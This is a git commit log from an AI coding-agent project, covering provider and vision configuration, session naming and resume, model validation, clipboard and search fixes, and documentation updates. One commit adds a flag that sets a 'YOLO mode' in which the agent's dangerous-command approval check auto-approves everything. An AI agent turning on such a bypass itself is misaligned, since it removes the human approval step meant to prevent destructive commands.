71e81728ac feat: Codex OAuth vision support + multimodal content adapter
The Codex Responses API (chatgpt.com/backend-api/codex) supports
vision via gpt-5.3-codex. This was verified with real API calls
using image analysis.

Changes to _CodexCompletionsAdapter:
- Added _convert_content_for_responses() to translate chat.completions
  multimodal format to Responses API format:
  - {type: 'text'} → {type: 'input_text'}
  - {type: 'image_url', image_url: {url: '...'}} → {type: 'input_image', image_url: '...'}
- Fixed: removed 'stream' from resp_kwargs (responses.stream() handles it)
- Fixed: removed max_output_tokens and temperature (Codex endpoint rejects them)

Provider changes:
- Added 'codex' as explicit auxiliary provider option
- Vision auto-fallback now includes Codex (OpenRouter → Nous → Codex)
  since gpt-5.3-codex supports multimodal input
- Updated docs with Codex OAuth examples

Tested with real Codex OAuth token + ~/.hermes/image2.png — confirmed
working end-to-end through the full adapter pipeline.

Tests: 2459 passed.
2026-03-08 18:44:33 -07:00
Teknium
ebe60646db Merge pull request #735 from NousResearch/hermes/hermes-f8d56335
fix: allow non-codex-suffixed models (e.g. gpt-5.4) with OpenAI Codex provider
2026-03-08 18:30:27 -07:00
teknium1
f996d7950b fix: trust user-selected models with OpenAI Codex provider
The Codex model normalization was rejecting any model without 'codex'
in its name, forcing a fallback to gpt-5.3-codex. This blocked models
like gpt-5.4 that the Codex API actually supports.

The fix simplifies _normalize_model_for_provider() to two operations:
1. Strip provider prefixes (API needs bare slugs)
2. Replace the *untouched default* model with a Codex-compatible one

If the user explicitly chose a model — any model — we trust them and
let the API be the judge. No allowlists, no slug checks.

Also removes the 'codex not in slug' filter from _read_cache_models()
so the local cache preserves all API-available models.

Inspired by OpenClaw's approach which explicitly lists non-codex models
(gpt-5.4, gpt-5.2) as valid Codex models.
2026-03-08 18:29:09 -07:00
teknium1
ae4a674c84 feat: add 'openai' as auxiliary provider option
Users can now set provider: "openai" for auxiliary tasks (vision, web
extract, compression) to use OpenAI's API directly with their
OPENAI_API_KEY. This hits api.openai.com/v1 with gpt-4o-mini as the
default model — supports vision since GPT-4o handles image input.

Provider options are now: auto, openrouter, nous, openai, main.

Changes:
- agent/auxiliary_client.py: added _try_openai(), "openai" case in
  _resolve_forced_provider(), updated auxiliary_max_tokens_param()
  to use max_completion_tokens for OpenAI
- Updated docs: cli-config.yaml.example, AGENTS.md, and user-facing
  configuration.md with Common Setups section showing OpenAI,
  OpenRouter, and local model examples
- 3 new tests for OpenAI provider resolution

Tests: 2459 passed (was 2429).
2026-03-08 18:25:30 -07:00
teknium1
169615abc8 docs: add Auxiliary Models section to user-facing configuration docs
Adds clear how-to documentation for changing the vision model, web
extraction model, and compression model to the user-facing docs site
(website/docs/user-guide/configuration.md).

Includes:
- Full auxiliary config.yaml example
- 'Changing the Vision Model' walkthrough with config + env var options
- Provider options table (auto/openrouter/nous/main)
- Multimodal safety warning for vision
- Environment variable reference table
- Updated the warning about OpenRouter-dependent tools to mention
  auxiliary model configuration
2026-03-08 18:10:55 -07:00
teknium1
7c30ac2141 fix: overhaul ascii-art skill with working sources (#662)
Major issues fixed:
- Removed dead APIs: artii.herokuapp.com (404 since Heroku free tier
  ended 2022), patorjk.com TAAG AJAX endpoint (404)
- Removed unusable sources: emojicombos.com (3.3MB JS blob, not
  curl-accessible), asciiart.eu (art loads via JavaScript only)

New working sources added:
- asciified API (asciified.thelicato.io): free text-to-ASCII REST API,
  250+ FIGlet fonts, returns plain text, no auth — perfect remote
  alternative when pyfiglet isn't installed
- ascii.co.uk: classic ASCII art archive, art in <pre> tags,
  extractable with simple curl + Python parsing
- qrenco.de: QR codes as ASCII art via curl
- wttr.in: weather and moon phase as ASCII art via curl

Also fixed: Tool 6 no longer relies on web_extract inside
execute_code (which was the original #662 bug). All web lookups
now use terminal curl which is universally available.
2026-03-08 18:09:44 -07:00
teknium1
192501528f docs: add Auxiliary Model Configuration section to AGENTS.md
Clear how-to documentation for changing the vision model, web extraction
model, and compression model. Includes config.yaml examples, env var
alternatives, provider options table, and multimodal safety notes.
2026-03-08 18:09:18 -07:00
teknium1
5ae0b731d0 fix: harden auxiliary model config — gateway bridge, vision safety, tests
Improvements on top of PR #606 (auxiliary model configuration):

1. Gateway bridge: Added auxiliary.* and compression.summary_provider
   config bridging to gateway/run.py so config.yaml settings work from
   messaging platforms (not just CLI). Matches the pattern in cli.py.

2. Vision auto-fallback safety: In auto mode, vision now only tries
   OpenRouter + Nous Portal (known multimodal-capable providers).
   Custom endpoints, Codex, and API-key providers are skipped to avoid
   confusing errors from providers that don't support vision input.
   Explicit provider override (AUXILIARY_VISION_PROVIDER=main) still
   allows using any provider.

3. Comprehensive tests (46 new):
   - _get_auxiliary_provider env var resolution (8 tests)
   - _resolve_forced_provider with all provider types (8 tests)
   - Per-task provider routing integration (4 tests)
   - Vision auto-fallback safety (7 tests)
   - Config bridging logic (11 tests)
   - Gateway/CLI bridge parity (2 tests)
   - Vision model override via env var (2 tests)
   - DEFAULT_CONFIG shape validation (4 tests)

4. Docs: Added auxiliary_client.py to AGENTS.md project structure.
   Updated module docstring with separate text/vision resolution chains.

Tests: 2429 passed (was 2383).
2026-03-08 18:06:47 -07:00
teknium1
d9f373654b feat: enhance auxiliary model configuration and environment variable handling
- Added support for auxiliary model overrides in the configuration, allowing users to specify providers and models for vision and web extraction tasks.
- Updated the CLI configuration example to include new auxiliary model settings.
- Enhanced the environment variable mapping in the CLI to accommodate auxiliary model configurations.
- Improved the resolution logic for auxiliary clients to support task-specific provider overrides.
- Updated relevant documentation and comments for clarity on the new features and their usage.
2026-03-08 18:06:47 -07:00
Teknium
0efbb137e8 Merge pull request #734 from NousResearch/hermes/hermes-f8d56335
feat: display previous messages when resuming a session in CLI
2026-03-08 18:06:00 -07:00
teknium1
cf63b2471f docs: add resume history display to sessions, CLI, config, and AGENTS docs
- sessions.md: New 'Conversation Recap on Resume' subsection with visual
  example, feature bullet points, and config snippet
- cli.md: New 'Session Resume Display' subsection with cross-reference
- configuration.md: Add resume_display to display settings YAML block
- AGENTS.md: Add _preload_resumed_session() and _display_resumed_history()
  to key components, add UX note about resume panel
2026-03-08 17:55:14 -07:00
0xbyt4
d8df91dfa8 fix: resolve merge conflict with main in clipboard.py 2026-03-09 03:50:29 +03:00
teknium1
f88343a6da Merge PR #733: feat: interactive session browser with search filtering (#718) 2026-03-08 17:47:42 -07:00
teknium1
491605cfea feat: add high-value tool result hints for patch and search_files (#722)
Add contextual [Hint: ...] suffixes to tool results where they save
real iterations:

- patch (no match): suggests read_file/search_files to verify content
  before retrying — addresses the common pattern where the agent retries
  with stale old_string instead of re-reading the file.
- search_files (truncated): provides explicit next offset and suggests
  narrowing the search — clearer than relying on total_count inference.

Other hints proposed in #722 (terminal, web_search, web_extract,
browser_snapshot, search zero-results, search content-matches) were
evaluated and found to be low-value: either already covered by existing
mechanisms (read_file pagination, similar-files, schema descriptions)
or guidance the agent already follows from its own reasoning.

5 new tests covering hint presence/absence for both tools.
2026-03-08 17:46:28 -07:00
teknium1
3aded1d4e5 feat: display previous messages when resuming a session in CLI
When resuming a session via --continue or --resume, show a compact recap
of the previous conversation inside a Rich panel before the input prompt.
This gives users immediate visual context about what was discussed.

Changes:
- Add _preload_resumed_session() to load session history early (in run(),
  before banner) so _init_agent() doesn't need a separate DB round-trip
- Add _display_resumed_history() that renders a formatted recap panel:
  * User messages shown with gold bullet (truncated at 300 chars)
  * Assistant responses shown with green diamond (truncated at 200 chars / 3 lines)
  * Tool calls collapsed to count + tool names
  * System messages and tool results hidden
  * <REASONING_SCRATCHPAD> blocks stripped from display
  * Pure-reasoning messages (no visible output) skipped entirely
  * Capped at last 10 exchanges with 'N earlier messages' indicator
  * Dim/muted styling distinguishes recap from active conversation
- Add display.resume_display config option: 'full' (default) or 'minimal'
- Store resume_display as instance variable (like compact) for testability
- 27 new tests covering all display scenarios, config, and edge cases

Closes #719
2026-03-08 17:45:45 -07:00
teknium1
4f0402ed3a chore: remove all NOUS_API_KEY references
NOUS_API_KEY is unused — vision tools use OPENROUTER_API_KEY or Nous
Portal OAuth (auth.json), and MoA tools use OPENROUTER_API_KEY.

Removed from:
- hermes_cli/config.py: api_keys allowlist for config set routing
- .env.example: example env file entry and comment
- tests/hermes_cli/test_set_config_value.py: parametrize test data
- tests/integration/test_web_tools.py: updated comments and log
  messages to reference 'auxiliary LLM provider' instead of NOUS_API_KEY

No HECATE references found in codebase (already cleaned up).
2026-03-08 17:45:38 -07:00
teknium1
ecac6321c4 feat: interactive session browser with search filtering (#718)
Add `hermes sessions browse` — a curses-based interactive session picker
with live type-to-search filtering, arrow key navigation, and seamless
session resume via Enter.

Features:
- Arrow keys to navigate, Enter to select and resume, Esc/q to quit
- Type characters to live-filter sessions by title, preview, source, or ID
- Backspace to edit filter, first Esc clears filter, second Esc exits
- Adaptive column layout (title/preview, last active, source, ID)
- Scrolling support for long session lists
- --source flag to filter by platform (cli, telegram, discord, etc.)
- --limit flag to control how many sessions to load (default: 50)
- Windows fallback: numbered list with input prompt
- After selection, seamlessly execs into `hermes --resume <id>`

Design decisions:
- Separate subcommand (not a flag on -c) — preserves `hermes -c` as-is
  for instant most-recent-session resume
- Uses curses (not simple_term_menu) per Known Pitfalls to avoid the
  arrow-key ghost-duplication rendering bug in tmux/iTerm
- Follows existing curses pattern from hermes_cli/tools_config.py

Also fixes: removed redundant `import os` inside cmd_sessions stats
block that shadowed the module-level import (would cause UnboundLocalError
if browse action was taken in the same function).

Tests: 33 new tests covering curses picker, fallback mode, filtering,
navigation, edge cases, and argument parser registration.
2026-03-08 17:42:50 -07:00
teknium1
20c6573e0a docs: comprehensive AGENTS.md audit and corrections
Major fixes:
- Default model: claude-sonnet-4.6 → claude-opus-4.6
- max_iterations default: 60 → 90 (also fixed in config.py OPTIONAL_ENV_VARS description)
- chat() signature: chat(user_message, task_id) → chat(message)
- Agent loop: _run_agent_loop() doesn't exist, loop is in run_conversation()
- Removed async/await references (agent is entirely synchronous)
- KawaiiSpinner location: run_agent.py → agent/display.py
- NOUS_API_KEY removed (not used by any tool), replaced with VOICE_TOOLS_OPENAI_KEY
- OPENAI_API_KEY for Whisper → VOICE_TOOLS_OPENAI_KEY
- check_for_missing_config() → check_config_version() + get_missing_env_vars()
- Adding tools: '2 files' → '3 files' (tool + model_tools.py + toolsets.py)
- Venv path: venv/ → .venv/
- Trajectory output path: trajectories/*.jsonl → trajectory_samples.jsonl
- process_command() location clarified (HermesCLI in cli.py, not commands.py)
- REQUIRED_ENV_VARS noted as intentionally empty
- _config_version noted as currently at version 5

New content:
- Project structure: added 40+ missing files across agent/, hermes_cli/, tools/, gateway/
- Full gateway/ directory listing with all modules and platforms/
- Added honcho_integration/, scripts/, tests/ directories
- Added hermes_constants.py, hermes_time.py, trajectory_compressor.py, utils.py
- CLI commands table: added 25+ missing commands (model, login, logout, whatsapp,
  skills subsystem, tools, insights, gateway start/stop/restart/status/uninstall,
  sessions export/delete/prune/stats, config path/env-path/show)
- Gateway slash commands section with all 20+ commands
- Platform toolsets: added hermes-cli, hermes-slack, hermes-homeassistant, hermes-gateway
- Gateway: added Home Assistant as supported platform
2026-03-08 17:38:05 -07:00
teknium1
97b1c76b14 test: add regression test for #712 (setup wizard codex import)
Verifies that setup.py imports the correct function name
(get_codex_model_ids) from codex_models.py. This would have caught
the ImportError bug before it reached users.
2026-03-08 17:32:52 -07:00
teknium1
24a37032fa Merge PR #711: fix(setup): correct import of get_codex_model_ids in setup wizard
Authored by dragonkhoi. Fixes #712.
2026-03-08 17:29:38 -07:00
teknium1
c0520223fd fix: clipboard BMP conversion file loss and broken test
Source code (hermes_cli/clipboard.py):
- _convert_to_png() lost the file when both Pillow and ImageMagick were
  unavailable: path.rename(tmp) moved the file to .bmp, then subprocess.run
  raised FileNotFoundError, but the file was never renamed back. The final
  fallback 'return path.exists()' returned False.
- Fix: restore the original file in both except handlers by renaming tmp
  back to path when the original is missing.

Test (tests/tools/test_clipboard.py):
- test_file_still_usable_when_no_converter expected 'from PIL import Image'
  to raise an Exception, but Pillow is installed so pytest.raises fired
  'DID NOT RAISE'. The test also never called _convert_to_png().
- Fix: properly mock PIL unavailability via patch.dict(sys.modules),
  actually call _convert_to_png(), and assert the correct result.
2026-03-08 17:22:27 -07:00
teknium1
1f1caa836a fix: error out when hermes -w is used outside a git repo
Previously, --worktree printed a yellow warning and continued without
isolation, silently defeating the purpose of the flag. Now it prints
a clear error message and exits immediately.
2026-03-08 17:22:24 -07:00
teknium1
b3ea7714f5 docs: add dedicated /compress command documentation
Add a detailed section for /compress in the CLI Commands Reference,
explaining what it does, when to use it, requirements, and output format.
Previously only had a one-line table entry.
2026-03-08 17:21:15 -07:00
teknium1
a7f9721785 feat: register remaining commands with platform menus
Telegram: add /insights, /update, /reload_mcp (underscore variant since
Telegram BotCommand names don't allow hyphens).

Discord: add /insights (with days parameter), /reload-mcp.

Also add reload_mcp as an alias for reload-mcp in the gateway command
dispatcher so Telegram's underscore form works, and add resume/provider
to the _known_commands set for hook emission.
2026-03-08 17:13:45 -07:00
teknium1
a5461e07bf feat: register title, resume, and other missing commands with platform menus
Add /title, /resume, /compress, /provider, /usage to Telegram's
set_my_commands so they appear in the / autocomplete menu.

Add /title, /resume, /compress, /provider, /usage, /help as Discord
slash commands so they appear in Discord's native command picker.

These commands were functional via text but not registered with the
platform-native command menus, so users couldn't discover them.
2026-03-08 17:11:49 -07:00
teknium1
2e73a9e893 Merge PR #704: fix: initialize Skills Hub before listing skills
Authored by PeterFile. Fixes #703.
2026-03-08 17:10:54 -07:00
teknium1
26bb56b775 feat: add /resume command to gateway for switching to named sessions
Messaging users can now switch back to previously-named sessions:
- /resume My Project  — resolves the title (with auto-lineage) and
  restores that session's conversation history
- /resume (no args)   — lists recent titled sessions to choose from

Adds SessionStore.switch_session() which ends the current session and
points the session entry at the target session ID so the old transcript
is loaded on the next message. Running agents are cleared on switch.

Completes the session naming feature from PR #720 for gateway users.

8 new tests covering: name resolution, lineage auto-latest, already-on-
session check, nonexistent names, agent cleanup, no-DB fallback, and
listing titled sessions.
2026-03-08 17:09:00 -07:00
teknium1
95b1130485 fix: normalize incompatible models when provider resolves to Codex
When _ensure_runtime_credentials() resolves the provider to openai-codex,
check if the active model is Codex-compatible.  If not (e.g. the default
anthropic/claude-opus-4.6), swap it for the best available Codex model.
Also strips provider prefixes the Codex API rejects (openai/gpt-5.3-codex
→ gpt-5.3-codex).

Adds _model_is_default flag so warnings are only shown when the user
explicitly chose an incompatible model (not when it's the config default).

Fixes #651.

Co-inspired-by: stablegenius49 (PR #661)
Co-inspired-by: teyrebaz33 (PR #696)
2026-03-08 16:48:56 -07:00
teknium1
3fb8938cd3 fix: search_files now reports error for non-existent paths instead of silent empty results
Previously, search_files would silently return 0 results when the
search path didn't exist (e.g., /root/.hermes/... when HOME is
/home/user). The path was passed to rg/grep/find which would fail
silently, and the empty stdout was parsed as 'no matches found'.

Changes:
- Add path existence check at the top of search() using test -e.
  Returns SearchResult with a clear error message when path doesn't exist.
- Add exit code 2 checks in _search_with_rg() and _search_with_grep()
  as secondary safety net for other error types (bad regex, permissions).
- Add 4 new tests covering: nonexistent path (content mode), nonexistent
  path (files mode), existing path proceeds normally, rg error exit code.

Tests: 37 → 41 in test_file_operations.py, full suite 2330 passed.
2026-03-08 16:47:20 -07:00
dmahan93
7791174ced feat: add --fuck-it-ship-it flag to bypass dangerous command approvals
Adds a fun alias for skipping all dangerous command approval prompts.
When passed, sets HERMES_YOLO_MODE=1 which causes check_dangerous_command()
to auto-approve everything.

Available on both top-level and chat subcommand:
  hermes --fuck-it-ship-it
  hermes chat --fuck-it-ship-it

Includes 5 tests covering normal blocking, yolo bypass, all patterns,
and edge cases (empty string env var).
2026-03-08 18:36:37 -05:00
Teknium
c5e8166c8b Merge pull request #720 from NousResearch/feat/session-naming
feat: Session naming with unique titles, auto-lineage & rich listing
2026-03-08 16:32:13 -07:00
teknium1
2b88568653 docs: add session naming documentation across all doc files
- website/docs/user-guide/sessions.md: New 'Session Naming' section
  with /title usage, title rules, auto-lineage, gateway support.
  Updated 'Resume by Name' section, 'Rename a Session' subsection,
  updated sessions list output format, updated DB schema description.
- website/docs/reference/cli-commands.md: Added -c "name" and
  --resume by title to Core Commands, sessions rename to Sessions
  table, /title to slash commands.
- website/docs/user-guide/cli.md: Added -c "name" and --resume by
  title to resume options.
- AGENTS.md: Added -c, --resume, sessions list/rename to CLI commands
  table. Added hermes_state.py to project structure.
- CONTRIBUTING.md: Updated hermes_state.py and session persistence
  descriptions to mention titles.
- hermes_cli/main.py: Fixed sessions help string to include 'rename'.
2026-03-08 16:09:31 -07:00
teknium1
34b4fe495e fix: add title validation — sanitize, length limit, control char stripping
- Add SessionDB.sanitize_title() static method:
  - Strips ASCII control chars (null, bell, ESC, etc.) except whitespace
  - Strips problematic Unicode controls (zero-width, RTL override, BOM)
  - Collapses whitespace runs, strips edges
  - Normalizes empty/whitespace-only to None
  - Enforces 100 char max length (raises ValueError)
- set_session_title() now calls sanitize_title() internally,
  so all call sites (CLI, gateway, auto-lineage) are protected
- CLI /title handler sanitizes early to show correct feedback
- Gateway /title handler sanitizes early to show correct feedback
- 24 new tests: sanitize_title (17 cases covering control chars,
  zero-width, RTL, BOM, emoji, CJK, length, integration),
  gateway validation (too long, control chars, only-control-chars)
2026-03-08 15:54:51 -07:00
teknium1
4fdd6c0dac fix: harden session title system + add /title to gateway
- Empty string titles normalized to None (prevents uncaught IntegrityError
  when two sessions both get empty-string titles via the unique index)
- Escape SQL LIKE wildcards (%, _) in resolve_session_by_title and
  get_next_title_in_lineage to prevent false matches on titles like
  'test_project' matching 'testXproject #2'
- Optimize list_sessions_rich from N+2 queries to a single query with
  correlated subqueries (preview + last_active computed in SQL)
- Add /title slash command to gateway (Telegram, Discord, Slack, WhatsApp)
  with set and show modes, uniqueness conflict handling
- Add /title to gateway /help text and _known_commands
- 12 new tests: empty string normalization, multi-empty-title safety,
  SQL wildcard edge cases, gateway /title set/show/conflict/cross-platform
2026-03-08 15:48:09 -07:00
teknium1
60b6abefd9 feat: session naming with unique titles, auto-lineage, rich listing, resume by name
- Schema v4: unique title index, migration from v2/v3
- set/get/resolve session titles with uniqueness enforcement
- Auto-lineage: context compression auto-numbers titles (Task -> Task #2 -> Task #3)
- resolve_session_by_title: auto-latest finds most recent continuation
- list_sessions_rich: preview (first 60 chars) + last_active timestamp
- CLI: -c accepts optional name arg (hermes -c 'my project')
- CLI: /title command with deferred mode (set before session exists)
- CLI: sessions list shows Title, Preview, Last Active, ID
- 27 new tests (1844 total passing)
2026-03-08 15:20:29 -07:00
teknium1
4d53b7ccaa Add OpenRouter app attribution headers to skills_guard and trajectory_compressor
These two files were creating bare OpenAI clients pointing at OpenRouter
without the HTTP-Referer / X-OpenRouter-Title / X-OpenRouter-Categories
headers that the rest of the codebase sends for app attribution.

- skills_guard.py: LLM audit client (always OpenRouter)
- trajectory_compressor.py: sync + async summarization clients
  (guarded with 'openrouter' in base_url check since the endpoint
  is user-configurable)
2026-03-08 14:23:18 -07:00
0xbyt4
0c3253a485 fix: mock asyncio.run in mirror test to prevent event loop destruction
asyncio.run() closes the event loop after execution, which breaks
subsequent tests using asyncio.get_event_loop() (test_send_image_file).
2026-03-09 00:20:19 +03:00
0xbyt4
d0f84c0964 fix: log exceptions instead of silently swallowing in cron scheduler
Two 'except Exception: pass' blocks silently hide failures:
- mirror_to_session failure: user's message never gets mirrored, no trace
- config.yaml parse failure: wrong model used silently

Replace with logger.warning so failures are visible in logs.
2026-03-09 00:06:34 +03:00
VolodymyrBg
ceefe36756 docs: clarify Telegram token regex constraint 2026-03-08 22:33:06 +02:00
0xbyt4
67421ed74f fix: update test_non_empty_has_markers to match todo filtering behavior
Completed/cancelled items are now filtered from format_for_injection()
output. Update the existing test to verify active items appear and
completed items are excluded.
2026-03-08 23:07:38 +03:00
Khoi Le
081079da62 fix(setup): correct import of get_codex_model_ids in setup wizard
The setup wizard imported `get_codex_models` which does not exist;
the actual function is `get_codex_model_ids`. This caused a runtime
ImportError when selecting the openai-codex provider during setup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-08 13:07:19 -07:00
0xbyt4
e2fe1373f3 fix: escalate read/search blocking, track search loops, filter completed todos
- Block file reads after 3+ re-reads of same region (no content returned)
- Track search_files calls and block repeated identical searches
- Filter completed/cancelled todos from post-compression injection
  to prevent agent from re-doing finished work
- Add 10 new tests covering all three fixes
2026-03-08 23:01:21 +03:00
memosr.eth
7891050e06 fix: use Path.read_text() instead of open() in browser_tool 2026-03-08 22:39:17 +03:00
memosr.eth
e28dc13cd5 fix: store and close log file handles in rl_training_tool 2026-03-08 22:38:02 +03:00
0xbyt4
9eee529a7f fix: detect and warn on file re-read loops after context compression
When context compression summarizes conversation history, the agent
loses track of which files it already read and re-reads them in a loop.
Users report the agent reading the same files endlessly without writing.

Root cause: context compression is lossy — file contents and read history
are lost in the summary. After compression, the model thinks it hasn't
examined the files yet and reads them again.

Fix (two-part):
1. Track file reads per task in file_tools.py. When the same file region
   is read again, include a _warning in the response telling the model
   to stop re-reading and use existing information.
2. After context compression, inject a structured message listing all
   files already read in the session with explicit "do NOT re-read"
   instruction, preserving read history across compression boundaries.

Adds 16 tests covering warning detection, task isolation, summary
accuracy, tracker cleanup, and compression history injection.
2026-03-08 20:44:42 +03:00
Verne
333e4abe30 fix: Initialize Skills Hub on list
Call ensure_hub_dirs() at the start of hermes skills list so the\nSkills Hub directory structure is created before reading hub\nmetadata.\n\nAdd a regression test covering the empty-home path where\ndoctor recommends running the list command.\n\nRefs: #703
2026-03-09 01:43:59 +08:00
teknium1
cd77c7100c Merge PR #648: test: add regression coverage for compressor tool-call boundaries
Authored by intertwine. Related to #647.
2026-03-08 06:46:50 -07:00
teknium1
cf810c2950 fix: pre-process CLI clipboard images through vision tool instead of raw embedding
Images pasted in the CLI were embedded as raw base64 image_url content
parts in the conversation history, which only works with vision-capable
models. If the main model (e.g. Nous API) doesn't support vision, this
breaks the request and poisons all subsequent messages.

Now the CLI uses the same approach as the messaging gateway: images are
pre-processed through the auxiliary vision model (Gemini Flash via
OpenRouter or Nous Portal) and converted to text descriptions. The
local file path is included so the agent can re-examine via
vision_analyze if needed. Works with any model.

Fixes #638.
2026-03-08 06:22:00 -07:00
teknium1
a23bcb81ce fix: improve /model user feedback + update docs
User messaging improvements:
- Rejection: '(>_<) Error: not a valid model' instead of '(^_^) Warning: Error:'
- Rejection: shows 'Model unchanged' + tip about /model and /provider
- Session-only: explains 'this session only' with reason and 'will revert on restart'
- Saved: clear '(saved to config)' confirmation

Docs updated:
- cli-commands.md, cli.md, messaging/index.md: /model now shows
  provider:model syntax, /provider command added to tables

Test fixes: deduplicated test names, assertions match new messages.
2026-03-08 06:13:12 -07:00
stablegenius49
d07d867718 Fix empty tool selection persistence 2026-03-08 06:11:18 -07:00
teknium1
666f2dd486 feat: /provider command + fix gateway bugs + harden parse_model_input
/provider command (CLI + gateway):
  Shows all providers with auth status (✓/✗), aliases, and active marker.
  Users can now discover what provider names work with provider:model syntax.

Gateway bugs fixed:
  - Config was saved even when validation.persist=False (told user 'session
    only' but actually persisted the unvalidated model)
  - HERMES_INFERENCE_PROVIDER env var not set on provider switch, causing
    the switch to be silently overridden if that env var was already set

parse_model_input hardened:
  - Colon only treated as provider delimiter if left side is a recognized
    provider name or alias. 'anthropic/claude-3.5-sonnet:beta' now passes
    through as a model name instead of trying provider='anthropic/claude-3.5-sonnet'.
  - HTTP URLs, random colons no longer misinterpreted.

56 tests passing across model validation, CLI commands, and integration.
2026-03-08 06:09:36 -07:00
teknium1
34792dd907 fix: resolve 'auto' provider properly via credential detection
'auto' doesn't always mean openrouter — it could be nous, zai,
kimi-coding, etc. depending on configured credentials. Reverted the
hardcoded mapping and now both CLI and gateway call
resolve_provider() to detect the actual active provider when 'auto'
is set. Falls back to openrouter only if resolution fails.
2026-03-08 05:58:45 -07:00
teknium1
7ad6fc8a40 fix: gateway /model also needs normalize_provider for 'auto' resolution 2026-03-08 05:56:43 -07:00
teknium1
f824c10429 feat: enhance config migration with new environment variable tracking
Added a system to track environment variables introduced in each config version, allowing migration prompts to only mention new variables since the user's last version. Updated the interactive configuration process to offer users the option to set these new optional keys during migration.
2026-03-08 05:55:32 -07:00
teknium1
132e5ec179 fix: resolve 'auto' provider in /model display + update gateway handler
- normalize_provider('auto') now returns 'openrouter' (the default)
  so /model shows the curated model list instead of nothing
- CLI /model display uses normalize_provider before looking up labels
- Gateway /model handler now uses the same validation logic as CLI:
  live API probe, provider:model syntax, curated model list display
2026-03-08 05:54:52 -07:00
teknium1
66d3e6a0c2 feat: provider switching via /model + enhanced model display
Add provider:model syntax to /model command for runtime provider switching:
  /model zai:glm-5           → switch to Z.AI provider with glm-5
  /model nous:hermes-3       → switch to Nous Portal with hermes-3
  /model openrouter:anthropic/claude-sonnet-4.5  → explicit OpenRouter

When switching providers, credentials are resolved via resolve_runtime_provider
and validated before committing. Both model and provider are saved to config.
Provider aliases work (glm: → zai, kimi: → kimi-coding, etc.).

Enhanced /model (no args) display now shows:
  - Current model and provider
  - Curated model list for the current provider with ← marker
  - Usage examples including provider:model syntax

39 tests covering parse_model_input, curated_models_for_provider,
provider switching (success + credential failure), and display output.
2026-03-08 05:45:59 -07:00
teknium1
4a09ae2985 chore: remove dead module stubs from test_cli_init.py
The 200 lines of prompt_toolkit/rich/fire stubs added in PR #650 were
guarded by 'if module in sys.modules: return' and never activated since
those dependencies are always installed. Removed to keep the test file
lean. Also removed unused MagicMock and pytest imports.
2026-03-08 05:35:02 -07:00
teknium1
8c734f2f27 fix: remove OpenRouter '/' format enforcement — let API probe be the authority
Not all providers require 'provider/model' format. Removing the rigid
format check lets the live API probe handle all validation uniformly.
If someone types 'gpt-5.4' on OpenRouter, the probe won't find it and
will suggest 'openai/gpt-5.4' — better UX than a format rejection.
2026-03-08 05:31:41 -07:00
teknium1
245d174359 feat: validate /model against live API instead of hardcoded lists
Replace the static catalog-based model validation with a live API probe.
The /model command now hits the provider's /models endpoint to check if
the requested model actually exists:

- Model found in API → accepted + saved to config
- Model NOT found in API → rejected with 'Error: not a valid model'
  and fuzzy-match suggestions from the live model list
- API unreachable → graceful fallback to hardcoded catalog (session-only
  for unrecognized models)
- Format errors (empty, spaces, missing '/') still caught instantly
  without a network call

The API probe takes ~0.2s for OpenRouter (346 models) and works with any
OpenAI-compatible endpoint (Ollama, vLLM, custom, etc.).

32 tests covering all paths: format checks, API found, API not found,
API unreachable fallback, CLI integration.
2026-03-08 05:22:20 -07:00
stablegenius49
77f47768dd fix: improve /history message display 2026-03-08 05:08:57 -07:00
aydnOktay
7b1f40dd00 Improve error handling and logging in code execution tool 2026-03-08 14:50:23 +03:00
teknium1
90fa9e54ca fix: guard validate_requested_model + expand test coverage (PR #649 follow-up)
- Wrap validate_requested_model in try/except so /model doesn't crash
  if validation itself fails (falls back to old accept+save behavior)
- Remove unnecessary sys.path.insert from both test files
- Expand test_model_validation.py: 4 → 23 tests covering normalize_provider,
  provider_model_ids, empty/whitespace/spaces rejection, OpenRouter format
  validation, custom endpoints, nous provider, provider aliases, unknown
  providers, fuzzy suggestions
- Expand test_cli_model_command.py: 2 → 5 tests adding known-model save,
  validation crash fallback, and /model with no argument
2026-03-08 04:47:35 -07:00
stablegenius49
9d3a44e0e8 fix: validate /model values before saving 2026-03-08 04:47:35 -07:00
teknium1
932d596466 feat: enhance systemd unit and install script for browser dependencies
Updated the systemd unit generation to include the virtual environment and node modules in the PATH, improving the execution context for the hermes CLI. Additionally, added support for installing Playwright and its dependencies on Arch/Manjaro systems in the install script, ensuring a smoother setup process for browser tools.
2026-03-08 04:36:23 -07:00
teknium1
d518f40e8b fix: improve browser command environment setup
Enhanced the environment setup for browser commands by ensuring the PATH variable includes standard directories, addressing potential issues with minimal PATH in systemd services. Additionally, updated the logging of stderr to use a warning level on failure for better visibility of errors. This change improves the robustness of subprocess execution in the browser tool.
2026-03-08 04:08:44 -07:00
Teknium
f016cfca46 Merge pull request #685 from NousResearch/revert-659-feat/skill-prerequisites
Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies"
2026-03-08 03:58:41 -07:00
Teknium
b8120df860 Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies" 2026-03-08 03:58:13 -07:00
teknium1
0df7df52f3 test: expand slash command autocomplete coverage (PR #645 follow-up)
- Fix failing test: use display_text/display_meta_text instead of str()
  on prompt_toolkit FormattedText objects
- Add regression guard: EXPECTED_COMMANDS set ensures no command
  silently disappears from the shared dict
- Add edge case tests: non-slash input, empty input, partial vs exact
  match trailing space, builtin display_meta content
- Add skill provider tests: None provider, exception swallowing,
  description truncation at 50 chars, missing description fallback,
  exact-match trailing space on skill commands
- Total: 15 tests (up from 4)
2026-03-08 03:53:22 -07:00
stablegenius49
bfa27d0a68 fix(cli): unify slash command autocomplete registry 2026-03-08 03:53:22 -07:00
teknium1
5a20c486e3 Merge PR #659: feat: skill prerequisites — hide skills with unmet runtime dependencies
Authored by kshitijk4poor. Fixes #630.
2026-03-08 03:12:35 -07:00
teknium1
78e19ebc95 chore: update .gitignore to include .worktrees directory
Added .worktrees to the .gitignore file to prevent tracking of worktree-specific files, ensuring a cleaner repository.
2026-03-08 03:01:46 -07:00
teknium1
b383cafc44 refactor: rename and enhance shell detection in local environment
Renamed _find_shell to _find_bash to clarify its purpose of specifically locating bash. Improved the shell detection logic to prioritize bash over the user's $SHELL, ensuring compatibility with the fence wrapper's syntax requirements. Added a backward compatibility alias for _find_shell to maintain existing imports in process_registry.py.
2026-03-08 03:00:05 -07:00
teknium1
b10ff83566 fix: enhance PATH handling in local environment
